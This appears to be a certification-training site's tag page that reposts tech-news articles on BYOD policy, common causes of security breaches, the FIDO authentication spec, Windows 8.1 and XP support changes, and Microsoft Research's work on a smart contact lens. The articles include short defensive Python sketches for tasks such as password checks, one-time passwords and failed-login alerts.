

MCTS Training, MCTS Certification exams Training at


Tag: Security

You’d think after all this time that organizations would have finally gotten BYOD programs pretty much down pat. Don’t bet on it.

A recent study by tyntec reveals that a vast majority of organizations still have inadequate bring-your-own-device (BYOD) policies. That’s not very encouraging, considering that 49 percent of workers now use a personal mobile device for work-related tasks and spend a great deal of time on personal devices for their job.

Further, the typical U.S. worker now expects to have nothing less than total access – anywhere, anytime, from any device – to their employer’s networks, finds another study from Dell and Intel. But despite all this demand on the user side, many organizations still wrestle with security, privacy and support issues around BYOD. That is holding many employers back when it comes to giving BYOD an enthusiastic ‘thumbs up’.

So what does it take to get BYOD right in 2015? CSO put that question to a few IT leaders, whose collective responses reflect the still wide divide on how BYOD is supported at the IT executive level, possibly depending on the industry in which they work.

An undeniable force

The higher education sector has embraced BYOD probably as much as any. No surprise here, really. College and university culture is all about openness – of ideas, of expression, and of access to resources. So it is only natural that today’s campus environment is awash with personal devices.

The University of Tennessee at Chattanooga is a prime example. According to Thomas Hoover, associate vice chancellor and CIO, and Susan Lazenby, manager of strategic planning and communication, BYOD has taken the campus by storm.

The two shared the school’s experiences with BYOD by stressing the impact it has had on the school’s IT organization, including staff and budget. But they confirmed that BYOD was a trend not to be denied, and the university had no choice but to adopt it. They also noted that a robust BYOD program is not just demanded by students, but also by faculty and employees.

To illustrate how rapidly BYOD caught on at UT, the two noted that five years ago the school’s network was supporting 809 devices. That number rose to 14,906 in 2014. This year it jumped to approximately 48,000.

It’s a similar tale hundreds of miles away at Worcester State University in Massachusetts.
“Like any other institute in higher education, Worcester State doesn’t have any choice but to support BYOD,” notes Anthony (Tony) Adade, CIO at the university. “The students come from diverse backgrounds. They come with all kinds of devices. For several years we’ve been seeing an influx of games on our campus – all kinds of games. Besides the normal devices that we have to deal with, we didn’t have any choice but to support them.”

Like at the University of Tennessee, wide-scale BYOD has been a fairly new phenomenon at Worcester State, but demand quickly made up for lost time.

“Initially it was limited. The network itself was at capacity and was not able to handle the devices coming on campus,” Adade explains. “We had to tell some students that they can’t bring devices on campus or if they did they were on their own. However, later on we realized it would be in our strategic interest to have a plan and to address the issue. Now we can safely accommodate almost every device.”

Colleges and universities aren’t the only organizations that have felt compelled to adopt BYOD programs, of course. Countless companies and nonprofits are also supporting programs, and have learned some important lessons in how to do it right.

“It is important to have technology in-house to support BYOD strategy,” notes Christine Vanderpool, CIO at Molson Coors, one of the nation’s leading brewers. “Companies should invest in tools like MDM, DLP and application monitoring (tools that inform the user of malicious applications on their devices). You need staff to support these tools. You need a strong set of policies, procedures and end user education.”

“It is good to focus on the ‘what’s in it for them’ in most cases,” Vanderpool stresses. “If you deploy MDM or application controls, you have to explain how this is protecting them in their daily life and not just in their work life.”

What are the most important elements of an effective BYOD program, one that provides employee flexibility and productivity while also ensuring company data and network security? Vanderpool offers the following tips on what should be considered:

“Give real life examples like how some malicious apps can take control/read all the user’s SMS text messages, see password information entered into a bank app, etc. People care most when they can understand it and [see how it] can potentially impact their lives beyond just their job,” Vanderpool says.

Not everyone’s a believer

But many CIOs remain skeptics when it comes to supporting BYOD, fearing that the probable risks still outweigh the possible benefits. One of them is Jim Motes, vice president and CIO at Rockwell Automation.

“I’m not really a fan of BYOD phones,” Motes says. “I believe the privacy constraints will be at odds with protecting and controlling corporate intellectual property.”

“The smartphone is not just communication technology, it’s a social lifeline, diary, and entertainment system,” Motes continues. “People have too much personal information stored on these systems and should be very careful about how much access they want to give their employers. Employers should avoid them completely to limit their liability should that personal information be breached and exposed.”

So how does an organization resolve these two competing forces: security and privacy concerns on one hand, versus user demand for convenience on the other?

Our sources offered the following combined tips on how to get BYOD right:

Have a thoughtful strategy
As noted, security remains a top concern for IT leaders when it comes to BYOD. It is therefore important to involve the IT security team in establishing a program from the outset. But the CSO’s role should be to help find a solution, not to find reasons to reject one. The focus should be on how best to secure the data first and foremost, then the devices.

Take stock of the situation
Once you’ve set your strategy, begin with assessments of network capacity and security posture. Issues to consider: How vulnerable is the network? Who is connecting to it? What devices and applications are they using?

Have a clear set of policies and expectations
You need a set of policy guidelines on what is and is not allowed, to guide the behavior of employees and users. Policies should be simple and easy to understand. Toward that end, have your employees help draft the policies to secure their understanding and support up-front.

Some devices are a ‘go’ and some are a ‘no’
Identify the devices you won’t be able to support; the program probably can’t be all things to all employees. Create an approved list of devices that IT will support, provided the employee has a valid business reason for using one. Purchase the devices at a reduced cost for employees, and put the necessary safeguards on them. Let employees know up front to what degree you will support a particular device purchase.

Proper training is critical
Educate employees on how to connect their devices to the network, as well as the dos and don’ts of usage. Lunchtime training sessions are a smart idea. Stress what it is that employees are agreeing to, including what happens if a device is lost or stolen – the wiping of the device. Most employees will say yes; those who don’t can’t participate in the program.

Finally, “BYOD risks and considerations will continue to grow and change just as rapidly as the technologies change,” stresses Vanderpool. “It is vital that all aspects of the BYOD model be continuously reviewed, updated, re-communicated and employees re-educated. The model deployed and the supporting guidelines, policies and procedures implemented to support it must be agile and allow the company to be able to quickly adapt or change them when necessary.”


Click here to view complete Q&A of 70-243 exam

MCTS Training, MCITP Training

Best Microsoft MCTS Certification, Microsoft 70-243 Training at


IT and security experts discuss the leading causes of security breaches and what your organization can do to reduce them.

Security breaches again made big news in 2014. Yet despite years of headline stories about security leaks and distributed denial-of-service (DDoS) attacks and repeated admonishments from security professionals that businesses (and individuals) needed to do a better job protecting sensitive data, many businesses are still unprepared or not properly protected from a variety of security threats.

Indeed, according to Trustwave’s recent 2014 State of Risk Report, which surveyed 476 IT professionals about security weaknesses, a majority of businesses had no or only a partial system in place for controlling and tracking sensitive data.

So, what can companies do to better protect themselves and their customers’ sensitive data from security threats? Dozens of security and IT experts were queried to find out. Following are the six most likely sources, or causes, of security breaches and what businesses can, and should, do to protect against them.

Risk No. 1: Disgruntled Employees

“Internal attacks are one of the biggest threats facing your data and systems,” states Cortney Thompson, CTO of Green House Data. “Rogue employees, especially members of the IT team with knowledge of and access to networks, data centers and admin accounts, can cause serious damage,” he says. Indeed, “there [were] rumors that the Sony hack was not [carried out by] North Korea but [was actually] an inside job.”

Solution: “The first step in mitigating the risk of privileged account exploitation is to identify all privileged accounts and credentials [and] immediately terminate those that are no longer in use or are connected to employees that are no longer at the company,” says Adam Bosnian, executive vice president, CyberArk.

“Next, closely monitor, control and manage privileged credentials to prevent exploitation. Finally, companies should implement necessary protocols and infrastructure to track, log and record privileged account activity [and create alerts, to] allow for a quick response to malicious activity and mitigate potential damage early in the attack cycle.”
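The lifecycle Bosnian outlines – inventory privileged accounts, terminate stale or orphaned ones, monitor the rest – can be sketched in a few lines. This is a minimal illustration with made-up account fields and thresholds, not CyberArk’s product or API:

```python
from datetime import datetime, timedelta

# Illustrative inventory of privileged accounts; in practice this would
# come from a directory service or a privileged-access-management tool.
accounts = [
    {"name": "svc_backup", "owner_active": True,  "last_used": datetime(2015, 1, 2)},
    {"name": "adm_jdoe",   "owner_active": False, "last_used": datetime(2014, 6, 1)},
    {"name": "adm_legacy", "owner_active": True,  "last_used": datetime(2013, 3, 15)},
]

def accounts_to_terminate(accounts, now, stale_after=timedelta(days=180)):
    """Flag privileged accounts that are unused or tied to departed employees."""
    flagged = []
    for acct in accounts:
        if not acct["owner_active"] or now - acct["last_used"] > stale_after:
            flagged.append(acct["name"])
    return flagged

print(accounts_to_terminate(accounts, now=datetime(2015, 1, 10)))
# flags adm_jdoe (owner gone) and adm_legacy (stale)
```

The same pass, run on a schedule, doubles as the monitoring step: anything newly flagged generates an alert rather than waiting for an annual audit.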

Risk No. 2: Careless or Uninformed Employees

“A careless worker who forgets [his] unlocked iPhone in a taxi is as dangerous as a disgruntled user who maliciously leaks information to a competitor,” says Ray Potter, CEO, SafeLogic. Similarly, employees who are not trained in security best practices and have weak passwords, visit unauthorized websites and/or click on links in suspicious emails or open email attachments pose an enormous security threat to their employers’ systems and data.

Solution: “Train employees on cyber security best practices and offer ongoing support,” says Bill Carey, vice president of Marketing for RoboForm. “Some employees may not know how to protect themselves online, which can put your business data at risk,” he explains. So it’s essential to “hold training sessions to help employees learn how to manage passwords and avoid hacking through criminal activity like phishing and keylogger scams. Then provide ongoing support to make sure employees have the resources they need.”

Also, “make sure employees use strong passwords on all devices,” he adds. “Passwords are the first line of defense, so make sure employees use passwords that have upper and lowercase letters, numbers and symbols,” Carey explains.

“It’s also important to use a separate password for each registered site and to change it every 30 to 60 days,” he continues. “A password management system can help by automating this process and eliminating the need for staff to remember multiple passwords.”
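Carey’s complexity rules are easy to automate as a first-pass check. A minimal sketch (the eight-character minimum is an added assumption; length and rotation requirements vary by policy):

```python
import re

def meets_policy(password):
    """Check the baseline rules: upper- and lowercase letters, digits, symbols."""
    checks = [
        r"[A-Z]",         # at least one uppercase letter
        r"[a-z]",         # at least one lowercase letter
        r"[0-9]",         # at least one digit
        r"[^A-Za-z0-9]",  # at least one symbol
    ]
    return len(password) >= 8 and all(re.search(p, password) for p in checks)

print(meets_policy("Tr0ub4dor&3"))  # True
print(meets_policy("password"))     # False: no uppercase, digit or symbol
```

A password manager, as Carey notes, handles the harder part: generating and rotating a distinct password per site so that staff never have to memorize them.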

Encryption is also essential.

“As long as you have deployed validated encryption as part of your security strategy, there is hope,” says Potter. “Even if the employee hasn’t taken personal precautions to lock their phone, your IT department can execute a selective wipe by revoking the decryption keys specifically used for the company data.”

To be extra safe, “implement multifactor authentication such as One Time Password (OTP), RFID, smart card, fingerprint reader or retina scanning [to help ensure] that users are in fact who you believe they are,” adds Rod Simmons, product group manager, BeyondTrust. “This helps mitigate the risk of a breach should a password be compromised.”
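Of the factors Simmons lists, a one-time password is the simplest to illustrate. The sketch below implements the standard HOTP/TOTP algorithms (RFC 4226/6238) that most authenticator apps and OTP tokens use; it is a teaching sketch, not any vendor’s implementation:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password."""
    msg = struct.pack(">Q", counter)                    # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                          # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, step: int = 30) -> str:
    """RFC 6238 time-based OTP: HOTP over the current 30-second window."""
    return hotp(secret, int(time.time()) // step)

# Server and device share the secret; matching codes prove possession of it.
print(totp(b"shared-secret"))
```

Real deployments add a clock-drift window and server-side rate limiting, but the compromised-password risk Simmons describes is mitigated by exactly this: the attacker also needs the current code.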
Risk No. 3: Mobile Devices (BYOD)

“Data theft is at high vulnerability when employees are using mobile devices [particularly their own] to share data, access company information, or neglect to change mobile passwords,” explains Jason Cook, CTO & vice president of Security, BT Americas. “According to a BT study, mobile security breaches have affected more than two-thirds (68 percent) of global organizations in the last 12 months.”

Indeed, “as more enterprises embrace BYOD, they face risk exposure from those devices on the corporate network (behind the firewall, including via the VPN) in the event an app installs malware or other Trojan software that can access the device’s network connection,” says Ari Weil, vice president, Product Marketing, Yottaa.

Solution: Make sure you have a carefully spelled out BYOD policy. “With a BYOD policy in place, employees are better educated on device expectations and companies can better monitor email and documents that are being downloaded to company or employee-owned devices,” says Piero DePaoli, senior director, Global Product Marketing, Symantec. “Monitoring effectively will provide companies with visibility into their mobile data loss risk, and will enable them to quickly pinpoint exposures if mobile devices are lost or stolen.”

Similarly, companies should “implement mobile security solutions that protect both corporate data and access to corporate systems while also respecting users’ privacy through containerization,” advises Nicko van Someren, CTO, Good Technology. “By securely separating business applications and business data on users’ devices, containerization ensures corporate content, credentials and configurations stay encrypted and under IT’s control, adding a strong layer of defense to once-vulnerable points of entry.”

You can also “mitigate BYOD risks with a hybrid cloud,” adds Matthew Dornquast, CEO and cofounder, Code42. “As unsanctioned consumer apps and devices continue to creep into the workplace, IT should look to hybrid and private clouds for mitigating potential risks brought on by this workplace trend,” he says. “Both options generally offer the capacity and elasticity of the public cloud to manage the plethora of devices and data, but with added security and privacy—such as the ability to keep encryption keys on-site no matter where the data is stored—for managing apps and devices across the enterprise.”

Risk No. 4: Cloud Applications

Solution: “The best defense [against a cloud-based threat] is to defend at the data level using strong encryption, such as AES 256-bit, recognized by experts as the crypto gold standard and retain the keys exclusively to prevent any third party from accessing the data even if it resides on a public cloud,” says Pravin Kothari, founder and CEO of CipherCloud. “As many of 2014’s breaches indicate, not enough companies are using data level cloud encryption to protect sensitive information.”

Risk No. 5: Unpatched or Unpatchable Devices

“These are network devices, such as routers, [servers] and printers that employ software or firmware in their operation, yet either a patch for a vulnerability in them was not yet created or sent, or their hardware was not designed to enable them to be updated following the discovery of vulnerabilities,” says Shlomi Boutnaru, cofounder & CTO, CyActive. “This leaves an exploitable device in your network, waiting for attackers to use it to gain access to your data.”

A leading breach candidate: the soon-to-be unsupported Windows Server 2003.

“On July 14, 2015, Microsoft will no longer provide support for Windows Server 2003 – meaning organizations will no longer receive patches or security updates for this software,” notes Laura Iwan, senior vice president of Programs, Center for Internet Security.

With over 10 million physical Windows 2003 servers still in use, and millions more in virtual use, according to Forrester, “expect these outdated servers to become a prime target for anyone interested in penetrating the networks where these vulnerable servers reside,” she says.

Solution: Institute a patch management program to ensure that devices, and software, are kept up to date at all times.

“Step one is to deploy vulnerability management technology to look on your network and see what is, and isn’t, up to date,” says Greg Kushto, director of the Security Practice at Force 3. “The real key, however, is to have a policy in place where everyone agrees that if a certain piece of equipment is not updated or patched within a certain amount of time, it is taken offline.”
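Kushto’s take-it-offline rule is straightforward to express in code. A minimal sketch, with an assumed 30-day window and an illustrative asset inventory:

```python
from datetime import date, timedelta

GRACE = timedelta(days=30)  # assumed patch window; set by your own policy

# Illustrative inventory: host -> date its oldest pending patch was released
pending_patches = {
    "web-01":  date(2015, 1, 5),
    "db-02":   date(2014, 11, 1),
    "file-03": date(2014, 12, 28),
}

def hosts_to_quarantine(pending, today):
    """Apply the agreed rule: unpatched past the window means taken offline."""
    return sorted(h for h, released in pending.items()
                  if today - released > GRACE)

print(hosts_to_quarantine(pending_patches, date(2015, 2, 1)))
# db-02 and file-03 have exceeded the 30-day window
```

The vulnerability-management tooling Kushto mentions supplies the inventory; the policy decision is just the comparison, which is why getting everyone to agree on the window up front matters more than the code.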

To avoid potential problems with Windows Server 2003, “identify all Windows Server 2003 instances; inventory all the software and functions of each server; prioritize each system based on risk and criticality; and map out a migration strategy and then execute it,” Iwan advises. And if you are unable to execute all the steps in-house, hire someone certified to assist you.

Risk No. 6: Third-party Service Providers

“As technology becomes more specialized and complex, companies are relying more on outsourcers and vendors to support and maintain systems,” notes Matt Dircks, CEO, Bomgar. “For example, restaurant franchisees often outsource the maintenance and management of their point-of-sale (POS) systems to a third-party service provider.”

However, “these third-parties typically use remote access tools to connect to the company’s network, but don’t always follow security best practices,” he says. “For example, they’ll use the same default password to remotely connect to all of their clients. If a hacker guesses that password, he immediately has a foothold into all of those clients’ networks.”

Indeed, “many of the high profile and extremely expensive breaches of the past year (think Home Depot, Target, etc.) were due to contractor’s login credentials being stolen,” states Matt Zanderigo, Product Marketing Manager, ObserveIT. “According to some recent reports, the majority of data breaches – 76 percent – are attributed to the exploitation of remote vendor access channels,” he says. “Even contractors with no malicious intent could potentially damage your systems or leave you open to attack.”

“This threat is multiplied exponentially due to the lack of vetting done by companies before allowing third parties to access their network,” adds Adam Roth, cybersecurity specialist from Dynamic Solutions International. “A potential data breach typically does not directly attack the most valuable server, but is more a game of leap frog, going from a low level computer that is less secure, then pivoting to other devices and gaining privileges,” he explains.

“Companies do a fairly good job ensuring critical servers avoid malware from the Internet,” he continues. “But most companies are pretty horrible at keeping these systems segmented from other systems that are much easier to compromise.”

Solution: “Companies need to validate that any third party follows remote access security best practices, such as enforcing multifactor authentication, requiring unique credentials for each user, setting least-privilege permissions and capturing a comprehensive audit trail of all remote access activity,” says Dircks.

In particular, “disable third-party accounts as soon as they are no longer needed; monitor failed login attempts; and have a red flag alerting you to an attack sent right away,” says Roth.
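Roth’s failed-login red flag can be as simple as a counter over the access log. A minimal sketch with illustrative vendor account names and an assumed five-failure threshold:

```python
from collections import Counter

THRESHOLD = 5  # assumed: alert after five failures per account

def failed_login_alerts(events, threshold=THRESHOLD):
    """Raise a red flag for any remote-access account with repeated failures."""
    failures = Counter(e["account"] for e in events if not e["success"])
    return {acct: n for acct, n in failures.items() if n >= threshold}

# Illustrative log entries for two third-party vendor accounts
events = (
    [{"account": "vendor-pos", "success": False}] * 6
    + [{"account": "vendor-hvac", "success": False}] * 2
    + [{"account": "vendor-pos", "success": True}]
)
print(failed_login_alerts(events))  # {'vendor-pos': 6}
```

In production this would read from the remote-access gateway’s audit trail and push an alert immediately, per Roth’s advice, rather than being reviewed after the fact.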

General Guidance on Dealing With Breaches

“Most organizations now realize that a breach is not a matter of if but when,” says Rob Sadowski, director of Technology Solutions for RSA. To minimize the impact of a security breach and leak, conduct a risk assessment to identify where your valuable data resides and what controls or procedures are in place to protect it.

Then, “build out a comprehensive incident response [and disaster recovery/business continuity] plan, determining who will be involved, from IT, to legal, to PR, to executive management, and test it.”


Expect a rush of vendors to adopt a simple, secure authentication scheme that might do away with passwords

Vendors of mobile devices are lining up to implement an authentication scheme meant to make online transactions both simpler and more secure, known as the Fast Identity Online (FIDO) specification, which is being released today.

Within a year there could be 20 to 30 vendors integrating FIDO in shipping products, says Michael Barrett, who heads up the FIDO Alliance, an industry group of more than 150 members that has written the specification.

This would greatly expand the handful of vendors and service providers who have so far been using the technology in its pre-spec incarnation to authenticate mobile users. The goal is to make FIDO more widely used by consumers, service providers and enterprises to reduce reliance on vulnerable usernames and passwords in favor of two-factor authentication, Barrett says.

The final implementation specification announced today means anyone interested in using FIDO has a solid ground on which to base it. Until now some parties have been jumping in using a preliminary FIDO-Ready spec that was subject to change depending on what the final version looked like.

The FIDO Alliance includes among its members some large and influential vendors, service providers and enterprises, including Google, PayPal, Bank of America, Wells Fargo, Microsoft, RSA, VISA, Discover, MasterCard, Lenovo and Alibaba.

The final specification describes two elements, a universal authentication framework (UAF) and a universal second factor (U2F), that together can ultimately eliminate usernames and passwords, and with them the risk that they are hacked, says Barrett.

UAF allows users to present a biometric – fingerprint, voiceprint, face recognition – that authenticates them to their devices. A client on the device then completes a secure connection to FIDO servers using the UAF protocol, signing the transaction with a private key generated by and stored on the device. A public key registered with the server verifies the client’s response to complete the authentication.
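In practice this exchange is a challenge-response signature: the device signs a server-supplied challenge with its private key, and the server checks the signature against the public key registered at enrollment. The toy sketch below uses deliberately tiny textbook-RSA numbers to show the shape of the exchange; real FIDO implementations rely on vetted cryptographic libraries and far larger keys:

```python
import hashlib

# Toy RSA key pair (insecure textbook parameters, for illustration only)
p, q = 61, 53
n = p * q            # modulus 3233
e = 17               # public exponent
d = 2753             # private exponent: d * e ≡ 1 mod (p-1)(q-1)

def sign(challenge: bytes) -> int:
    """Device side: sign the server's challenge with the private key."""
    h = int.from_bytes(hashlib.sha256(challenge).digest(), "big") % n
    return pow(h, d, n)

def verify(challenge: bytes, signature: int) -> bool:
    """Server side: verify with the public key registered at enrollment."""
    h = int.from_bytes(hashlib.sha256(challenge).digest(), "big") % n
    return pow(signature, e, n) == h

challenge = b"nonce-from-server"
sig = sign(challenge)
print(verify(challenge, sig))  # True
```

The private key never leaves the device, which is the property that lets FIDO drop the shared password: the server stores only public keys, so a server breach leaks nothing an attacker can replay.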

U2F is a small hardware dongle that can be inserted into the client machine. Users authenticate to servers using username and password and are prompted to use the dongle inserted in a USB port on their machines as a two-factor second layer of authentication. Next year the dongles will support not only USB but also Bluetooth, near field communications (NFC) and LTE wireless technologies, Barrett says.

The long-term goal of FIDO is to eliminate usernames and passwords altogether, but if they choose to and have appropriately equipped machines users can immediately use biometrics instead.

Already some entities are employing FIDO client-server technology to protect online transactions. Samsung (Galaxy S5) and Lenovo have installed the clients on some of their phones and laptops that have fingerprint readers. PayPal has implemented a FIDO server to support authentication for online transactions. Google has implemented support for U2F in its Chrome browser, and Google users can use it to securely log in to their Google accounts.

Vendors have stepped up to supply FIDO hardware and software to those who don’t want to do the work themselves. For example Nok Nok Labs sells FIDO clients and servers that are used by PayPal as well as Alipay, and Yubico sells FIDO dongles.

At $50 or less, the dongles are less expensive than security tokens costing hundreds of dollars that generate new authentication codes at set intervals and are synched with authentication servers. The dongles may not be as secure, but they are more secure than simple username and password.



Mandates Windows 8.1 Update to receive future patches; evidence of commitment to constant OS refreshes, say experts

Microsoft’s demand that Windows 8.1 users install this week’s major update was another signal that the company is very serious about forcing customers to adopt its faster release strategy, experts said today.

“Microsoft is going to drag organizations and users into this new world of faster updates kicking and screaming,” said Michael Silver of Gartner in an email. “Microsoft wants users to trust it to keep their systems updated. Maybe they figure forcing organizations to deploy [Windows 8.1 Update] will get them used to taking updates and keeping current.”

Earlier this week, Microsoft shipped Windows 8.1 Update (8.1U), adding that to obtain future updates, including fixes for vulnerabilities distributed each month on “Patch Tuesday,” Windows 8.1 users had to install 8.1U.

“Failure to install this Update will prevent Windows Update from patching your system with any future updates starting with updates released in May 2014,” Microsoft said.

May 13 is the first Patch Tuesday that will require 8.1U.

That requirement got the attention of users. And not in a good way.

“What happened to Microsoft’s Lifecycle policy with providing customers with a 24-month timeframe before ending support of a superseded operating system RTM/Service Pack?” asked a user identified as “wdeguara” in a comment appended Tuesday to Microsoft’s blog-based announcement. “By immediately withdrawing all future security updates for Windows 8.1 RTM, in the eyes of most enterprise customers you are effectively performing an immediate End-of-Life on Windows 8.1 RTM.

“I know that Microsoft wants its customer base to adopt updates to its Windows platform faster, but immediately dropping security patching on the Windows 8.1 RTM release is just plain crazy,” wdeguara added.

But to Silver, that is exactly Microsoft’s intent.

Others see similar method to Microsoft’s madness.

“The reality is that Microsoft is moving the OS toward a more service-oriented model,” said Wes Miller, an analyst with Directions on Microsoft, in a Thursday telephone interview. “This reflects the fact that there are shifting sands, that Microsoft is trying to move toward one servicing model for a variety of platforms. They’re trying to harmonize Windows Phone and Windows with one servicing model that works for everyone.”

From Miller’s perspective, Microsoft was striving for a mobile-style model for Windows that would not only rely on more frequent updates, but one with a goal of getting the bulk of users onto each new this-is-current update or version.

Other Microsoft customers joined wdeguara to criticize the forced migration, which had not been announced prior to Tuesday and which they saw as a betrayal of the 24-month rule that has given them two years from the launch of a service pack to upgrade from the original, called “RTM” in Microsoft-speak to reference “release to manufacturing.”

“This is a massive shift from a patching perspective,” said Julian Harper, an IT manager, in one of several messages posted to the mailing list on the topic. “For years, we’ve had [two] years to plan service pack roll outs and now we’re given one month. And this is on top of the fiasco that was Windows 8.1 for volume license customers.”

Previously, Microsoft had said that the 24-month rule for Windows, once reserved for service packs, would apply to Windows 8 and its successors, including Windows 8.1 of October 2013, even though the latter was not labeled as a “service pack.” Customers on Windows 8 RTM, which shipped in October 2012, would have until Jan. 12, 2016 to migrate to Windows 8.1. After that date, Windows 8 RTM will not be eligible for security updates and other fixes and enhancements.

“Microsoft has the most generous and transparent support policies, but everything depends on what they call the new code,” said Silver. “A ‘service pack’ has a support policy. A ‘version’ has a support policy. Something with a different name, well, Microsoft can do what it wants.”

Miller wasn’t shocked at the complaints from enterprise IT personnel, like Harper. “It bothered me, too,” Miller said. “The support lifecycle page doesn’t reflect this, and it absolutely should,” he continued, referring to Microsoft’s support timetable for Windows 8 and Windows 8.1. “Customers need to be able to keep track of what they have to do for support.”

Andrew Storms, director of DevOps at CloudPassage, a San Francisco-based cloud security firm, acknowledged the historic nature of the Windows 8.1 Update’s deployment requirement.

“What was surprising to me was that there was no prior notification from Microsoft,” Storms said. “But what was not so surprising was that they made this decision. The number of SKUs that they support is getting out of hand. Microsoft can only support so many products. At some point, they just have to cut it.”

Storms sympathized with corporate IT administrators nervous about the rapid release pace.

“Given the environment they’re in, the complaints were well justified,” Storms said. Traditionally, that has been an environment where companies downloaded an update, tested it for weeks or even months, then slowly deployed it to devices.

“That’s an ongoing process that’s constantly in motion,” said Storms of the practice. “But we know everyone needs to move to [a process] where you have to take the updates as they are. So this really calls for a new way of thinking. IT must rethink the environment that they’re in.”

In other words, enterprises may not like Microsoft mandating 8.1U but they’ll have to learn to live with not only that, but future demands, too. “If the [software vendors] are moving faster than you can keep up with using the traditional methodology, you’re going to have to just take [the updates],” Storms said.

Microsoft did not reply to questions, including why it mandated 8.1U and whether it believed the requirement is a change of its 24-month rule.




Microsoft and its hardware partners really, really want everyone to abandon Windows XP by April 8. But the world won’t end if you don’t.

It’s the end of an era at Microsoft. No, I’m not talking about CEO Steve Ballmer retiring and being replaced by Satya Nadella, though that also qualifies. I’m referring to the imminent “death” of support for Microsoft’s long-running Windows XP operating system.

Microsoft — and its hardware partners like HP, Dell, and many others — really, really, really want you and everyone else to upgrade to Windows 8.1, or at least Windows 7. In hopes that Windows XP upgrades will save the PC industry, they’re pulling out all the stops, from warning of potential security catastrophes to offering discounts and special financing on new hardware, along with a wide variety of assessment tools and migration services designed to ease the process. They’re even inviting small groups of journalists to dinner to discuss the issue!

Is April 8 the new Y2K?

The efforts seem to be working for enterprises. Jordan Chrysafidis, Microsoft’s vice president of OEM worldwide marketing, said that only 10% of enterprises in the developed world still use XP exclusively — although he also said that 24% of small businesses don’t even know that XP is reaching its end-of-service date. Either way, though, it’s pretty clear that not everyone is going to upgrade by the April 8 support cut-off.

Like other tech scares dating back to Y2K, that may not cause an immediate disaster.

Don’t get me wrong: I’m totally behind the upgrade push. Windows XP is ancient and no longer delivers a state-of-the-art computing experience — it was designed long before touch, the cloud, mobility, virtualization, and modern management techniques took center stage. XP users can’t hope to take advantage of modern trends and cope with today’s threats.

But that’s the point. Failing to upgrade from Windows XP is more about forgoing the advantages of modern technology than it is about some arbitrary doomsday. Things aren’t going to be dramatically different for XP users on April 9 than they were on April 7 — though they’re likely to get worse over time. It’s just that XP users will be leaving the promise of the 21st Century on the table.

According to Chrysafidis, for example, one recent study showed that upgrading to Windows 7 or 8.1 can save $700 per year per user — one more argument for using a modern OS. But it’s also hardly an imperative to make the switch by any specific date, or for every machine in every application to be instantly upgraded.

XP is everywhere
Windows XP was incredibly popular and remains deeply ingrained in machines of all types used for all sorts of purposes. (Heck, I’ve still got an old netbook running XP.) XP is found in millions of small businesses, retail outlets, and factory floors, and the upgrade usually isn’t just a matter of swapping in a new operating system. In many cases, you’ll need brand-new hardware and have to upgrade proprietary apps that don’t work on other versions of Windows (most packaged apps are compatible). That’s simply not top of mind — or budget — for many users and organizations. Again, the new hardware is going to be way better, cheaper, and more reliable than the old XP boxes it replaces, but you already own the XP machines, so that’s not always a useful comparison.

As Chrysafidis pointed out, upgrading from XP is a great opportunity to remake outmoded business processes as well as replace hardware and software. But that’s a big deal that requires serious planning — it doesn’t make sense to tackle a major project like that on Microsoft’s timetable. Waiting carries risks — security breaches or aging hardware giving up the ghost at an inopportune moment — but so does rushing into an upgrade process you’re not ready for or can’t afford.

No excuse not to upgrade
Yes, you’re going to have to upgrade from Windows XP, and sooner is better than later. But if you ask me, it’s more important to do it right than to do it fast. Far better to leverage the opportunity to truly take advantage of what modern technology has to offer than scramble to meet the April 8 deadline just to end up doing the same old things on a shiny new PC with a shiny new operating system. (As long as you don’t get hacked in the meantime, of course.)


Google X may have announced its smart contact lens project, but Microsoft Research says it worked on it first.

Do you recall how Microsoft has claimed it invented, or invisibly runs, practically everything? Along those lines, Microsoft Research is claiming partial credit for the smart contact lens project that Google unveiled last week.

Google announced that it was testing a smart contact lens that has “chips and sensors so small they look like bits of glitter, and an antenna thinner than a human hair.”

We’re now testing a smart contact lens that’s built to measure glucose levels in tears using a tiny wireless chip and miniaturized glucose sensor that are embedded between two layers of soft contact lens material. We’re testing prototypes that can generate a reading once per second. We’re also investigating the potential for this to serve as an early warning for the wearer, so we’re exploring integrating tiny LED lights that could light up to indicate that glucose levels have crossed above or below certain thresholds. It’s still early days for this technology, but we’ve completed multiple clinical research studies which are helping to refine our prototype. We hope this could someday lead to a new way for people with diabetes to manage their disease.

After Google’s announcement, Desney Tan, a Principal Researcher at Microsoft Research, was bombarded with questions about his “long-time friends and colleagues” Babak Parviz and Brian Otis, who had declared their intent to develop a glucose-sensing contact lens. Tan’s “inbox and voicemail are stuffed with calls for comments and queries about the relationship of this project to the one Microsoft Research worked on with Babak and Brian a few years ago.”

So Tan wrote:
As background, my team and I here at Microsoft Research had the pleasure of supporting and working with Babak and Brian and a number of other collaborators very early in this project. Babak and Brian were still full-time faculty at the University of Washington. In our collaboration, we demonstrated the feasibility not only of embedding displays in the contact lenses, but more importantly, of glucose sensing as well. As one would imagine, we tackled numerous hard problems around miniaturization, wireless power, wireless communications and biocompatibility.

What’s occurred here is a great example of why we and others must continue to invest in basic research, pushing the boundaries of science and technology in an effort to improve the lives of as many people as possible. Most of the time here at Microsoft, we do this in partnership with our business group colleagues, who can take direct advantage of our work and deliver it directly to our customers. But there are other instances where we do this through partners, and sometimes even through competitors. Our open research and deeply collaborative model allows us to work with the best academic and industrial researchers around the world, and we will continue to do so as we certainly believe in the philosophy that “we” is smarter than “me.” This open approach to working with and through others has consistently delivered outsized rewards for Microsoft and for the world at large.

I’m not faulting Tan, more power to him, just pointing out that Microsoft apparently had a hand in Google’s glucose-sensing contact lens. After all, Microsoft has taken credit for inventing, or its software invisibly running, almost everything. To be fair, Microsoft Research has over 1,100 researchers who work on everything from privacy and security to healthcare.

In fact, Microsoft Research recently adopted an Open Access policy for all research publications.

Microsoft Research is committed to disseminating the fruits of its research and scholarship as widely as possible because we recognize the benefits that accrue to scholarly enterprises from such wide dissemination, including more thorough review, consideration and critique, and general increase in scientific, scholarly and critical knowledge.

Like Microsoft, Google has a lot of power and money. However, unlike Microsoft Research, most of the “moonshot” research that goes on inside Google X, “Google’s secret lab,” is hush-hush . . . at least until the company decides to shock the world with its projects like Google Glass and the Google driverless car.

